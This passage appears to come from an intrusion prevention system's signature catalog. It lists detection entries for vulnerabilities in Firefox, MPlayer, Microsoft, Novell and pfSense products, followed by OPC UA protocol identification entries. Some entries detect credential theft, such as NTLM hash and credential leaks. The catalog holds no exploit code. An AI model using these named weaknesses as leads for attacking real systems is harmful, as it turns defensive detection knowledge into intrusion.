Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Mozilla-Firefox-XBL-Event-Handler-Tags-Removal-Memory-Corruption
Description:
Back to top

File-TextId_Mozilla-Firefox-XUL-menupopup.menu-Null-Pointer-Dereference-DoS

About this situation: Mozilla Firefox XUL menupopup.menu Null Pointer Dereference DoS vulnerability.
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2007, Any Operating System not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1621-5242
Vulnerability: Mozilla-Firefox-XUL-menupopup.menu-Null-Pointer-Dereference-DoS
Description:
Back to top

File-TextId_Mozilla-Products-SVG-Layout-Engine-Index-Parameter-Memory-Corruption

About this situation: Attempt to exploit a memory corruption vulnerability in Mozilla Foundation's family of browser products detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Mozilla-Products-SVG-Layout-Engine-Index-Parameter-Memory-Corruption
Description:
Back to top

File-TextId_Mozilla-Products-SVG-Rendering-Engine-Integer-Overflow

About this situation: Exploit against integer overflow vulnerability in Scalable Vector Graphics rendering engine in Mozilla products
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Mozilla Suite, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Products-SVG-Rendering-Engine-Integer-Overflow
Description:
Back to top

File-TextId_Mozilla-SVG-Data-Processing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-SVG-Data-Processing-Memory-Corruption
Description:
Back to top

File-TextId_MPlayer-Sami-Subtitle-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MPlayer Project MPlayer detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MPlayer, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: MPlayer-Sami-Subtitle-Buffer-Overflow
Description:
Back to top

File-TextId_MS-Active-Directory-Federation-Services-Information-Disclosure

About this situation: A possible information disclosure detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows 2008, Any Hardware, MS2013-08, CVE2013, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-1255-5242
Vulnerability: Microsoft-Active-Directory-Federation-Services-Information-Disclosure
Description:
Back to top

File-TextId_MS-Visio-DXF-File-Buffer-Overflow-CVE-2012-1888

About this situation: An attempt to exploit a vulnerability in Microsoft Visio detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visio, MS2012-08, CVE2012, Windows not specific, Microsoft Visio not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1412-5242
Vulnerability: MS-Visio-DXF-File-Buffer-Overflow-CVE-2012-1888
Description:
Back to top

File-TextId_MS-Windows-Msxml-Information-Disclosure-Vulnerability

About this situation: An attempt to exploit vulnerability in Microsoft MSXML detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-02, CVE2014, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: MS-Windows-Msxml-Information-Disclosure-Vulnerability
Description:
Back to top

File-TextId_Netgate-Pfsense-Restore_rrddata-Command-Injection

About this situation: An attempt to exploit a vulnerability in Netgate pfSense detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Netgate pfSense, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1579-5242
Last changed: sgpkg-ips-1579-5242
Vulnerability: Netgate-Pfsense-Restore_rrddata-Command-Injection
Description:
Back to top

File-TextId_NewsGator-FeedDemon-OPML-Outline-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in NewsGator FeedDaemon
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, NewsGator FeedDemon, CVE2009, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: NewsGator-FeedDemon-OPML-Outline-Buffer-Overflow
Description:
Back to top

File-TextId_NI-Flexlogger-Flxproj-File-Parsedatavalueasxmlhierarchy-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in National Instruments FlexLogger detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, National Instruments FlexLogger, National Instruments InstrumentStudio, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Vulnerability: NI-Flexlogger-Flxproj-File-Parsedatavalueasxmlhierarchy-Insecure-Deserialization
Description:
Back to top

File-TextId_Novell-eDirectory-eMBox-Unauthenticated-File-Access

About this situation: An attempt to exploit a Novell eDirectory eMBox Unauthenticated File Access vulnerability detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2008, Any Operating System not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: Novell-eDirectory-eMBox-Unauthenticated-File-Access
Description:
Back to top

File-TextId_Novell-Groupwise-Addressbook-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell GroupWise detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-444-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Novell-Groupwise-Addressbook-Heap-Buffer-Overflow
Description:
Back to top

File-TextId_Novell-Groupwise-iCal-RRULE-Time-Conversion-Invalid-Array-Indexing

About this situation: Attempt to exploit a vulnerability in Novell Groupwise detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Novell-Groupwise-iCal-RRULE-Time-Conversion-Invalid-Array-Indexing
Description:
Back to top

File-TextId_Novell-Groupwise-Internet-Agent-ICalendar-Parsing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Novell GroupWise detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-488-5211
Vulnerability: Novell-Groupwise-Internet-Agent-ICalendar-Parsing-Denial-Of-Service
Description:
Back to top

File-TextId_Novell-Groupwise-Internet-Agent-RRULE-Weekday-Parsing

About this situation: An attempt to exploit a vulnerability in Novell Groupwise detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Novell-Groupwise-Internet-Agent-RRULE-Weekday-Parsing-Buffer-Overflow
Description:
Back to top

File-TextId_Novell-Groupwise-Messenger-Client-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell GroupWise Messenger Client detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise Messenger, CVE2008, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: Novell-Groupwise-Messenger-Client-Buffer-Overflow
Description:
Back to top

File-TextId_NTLM-Credential-Leak-Via-Internet-Shortcut-CVE-2023-32046

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-07, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1609-5242
Last changed: sgpkg-ips-1752-5242
Vulnerability: NTLM-Credentials-Leak-Via-Internet-Shortcut-CVE-2023-32046
Description:
Back to top

File-TextId_NTLM-Hash-Disclosure-CVE-2024-43451

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-11, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Vulnerability: NTLM-Hash-Disclosure-CVE-2024-43451
Description:
Back to top

File-TextId_Office-Open-XML-Document

About this situation: Office Open XML document download detected
Context: Identified Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1525-5242
Vulnerability: File-Type-Identification
Description:
Back to top

File-TextId_Office-Open-XML-Workbook

About this situation: Office Open XML workbook download detected
Context: Identified Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1525-5242
Vulnerability: File-Type-Identification
Description:
Back to top

File-TextId_Office-XML-Macro-Document

About this situation: An Office XML document with macros detected
Context: Identified Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1118-5242
Last changed: sgpkg-ips-1118-5242
Vulnerability: Office-XML-Macro-Document
Description:
Back to top

File-TextId_Office-XML-Object-Shared-Variables

About this situation: Detected base64 encoded HTML object
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information
First detected in: sgpkg-ips-722-5211
Last changed: sgpkg-ips-734-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-ActivateSession-Request

About this situation: An OPC UA HTTP/XML ActivateSession request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-ActivateSession-Response

About this situation: An OPC UA HTTP/XML ActivateSession response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-AddNodes-Request

About this situation: An OPC UA HTTP/XML AddNodes request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-AddNodes-Response

About this situation: An OPC UA HTTP/XML AddNodes response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-AddReferences-Request

About this situation: An OPC UA HTTP/XML AddReferences request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-AddReferences-Response

About this situation: An OPC UA HTTP/XML AddReferences response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Browse-Request

About this situation: An OPC UA HTTP/XML Browse request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Browse-Response

About this situation: An OPC UA HTTP/XML Browse response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-BrowseNext-Request

About this situation: An OPC UA HTTP/XML BrowseNext request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-BrowseNext-Response

About this situation: An OPC UA HTTP/XML BrowseNext response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Call-Request

About this situation: An OPC UA HTTP/XML Call request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Call-Response

About this situation: An OPC UA HTTP/XML Call response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Cancel-Request

About this situation: An OPC UA HTTP/XML Cancel request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Cancel-Response

About this situation: An OPC UA HTTP/XML Cancel response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-CloseSecureChannel-Request

About this situation: An OPC UA HTTP/XML CloseSecureChannel request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-CloseSecureChannel-Response

About this situation: An OPC UA HTTP/XML CloseSecureChannel response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-CloseSession-Request

About this situation: An OPC UA HTTP/XML CloseSession request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-CloseSession-Response

About this situation: An OPC UA HTTP/XML CloseSession response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-CreateMonitoredItems-Request

About this situation: An OPC UA HTTP/XML CreateMonitoredItems request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-CreateMonitoredItems-Response

About this situation: An OPC UA HTTP/XML CreateMonitoredItems response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-CreateSession-Request

About this situation: An OPC UA HTTP/XML CreateSession request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-CreateSession-Response

About this situation: An OPC UA HTTP/XML CreateSession response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-CreateSubscription-Request

About this situation: An OPC UA HTTP/XML CreateSubscription request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-CreateSubscription-Response

About this situation: An OPC UA HTTP/XML CreateSubscription response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-DeleteMonitoredItems-Request

About this situation: An OPC UA HTTP/XML DeleteMonitoredItems request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-DeleteMonitoredItems-Response

About this situation: An OPC UA HTTP/XML DeleteMonitoredItems response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-DeleteNodes-Request

About this situation: An OPC UA HTTP/XML DeleteNodes request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-DeleteNodes-Response

About this situation: An OPC UA HTTP/XML DeleteNodes response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-DeleteReferences-Request

About this situation: An OPC UA HTTP/XML DeleteReferences request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-DeleteReferences-Response

About this situation: An OPC UA HTTP/XML DeleteReferences response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-DeleteSubscriptions-Request

About this situation: An OPC UA HTTP/XML DeleteSubscriptions request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-DeleteSubscriptions-Response

About this situation: An OPC UA HTTP/XML DeleteSubscriptions response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-FindServers-Request

About this situation: An OPC UA HTTP/XML FindServers request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-FindServers-Response

About this situation: An OPC UA HTTP/XML FindServers response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-GetEndpoints-Request

About this situation: An OPC UA HTTP/XML GetEndpoints request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-GetEndpoints-Response

About this situation: An OPC UA HTTP/XML GetEndpoints response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-HistoryRead-Request

About this situation: An OPC UA HTTP/XML HistoryRead request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-HistoryRead-Response

About this situation: An OPC UA HTTP/XML HistoryRead response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-HistoryUpdate-Request

About this situation: An OPC UA HTTP/XML HistoryUpdate request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-HistoryUpdate-Response

About this situation: An OPC UA HTTP/XML HistoryUpdate response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-ModifyMonitoredItems-Request

About this situation: An OPC UA HTTP/XML ModifyMonitoredItems request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-ModifyMonitoredItems-Response

About this situation: An OPC UA HTTP/XML ModifyMonitoredItems response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-ModifySubscription-Request

About this situation: An OPC UA HTTP/XML ModifySubscription request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-ModifySubscription-Response

About this situation: An OPC UA HTTP/XML ModifySubscription response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-OpenSecureChannel-Request

About this situation: An OPC UA HTTP/XML OpenSecureChannel request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-OpenSecureChannel-Response

About this situation: An OPC UA HTTP/XML OpenSecureChannel response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Publish-Request

About this situation: An OPC UA HTTP/XML Publish request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Publish-Response

About this situation: An OPC UA HTTP/XML Publish response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-QueryFirst-Request

About this situation: An OPC UA HTTP/XML QueryFirst request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-QueryFirst-Response

About this situation: An OPC UA HTTP/XML QueryFirst response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-QueryNext-Request

About this situation: An OPC UA HTTP/XML QueryNext request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-QueryNext-Response

About this situation: An OPC UA HTTP/XML QueryNext response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Read-Request

About this situation: An OPC UA HTTP/XML Read request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Read-Response

About this situation: An OPC UA HTTP/XML Read response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
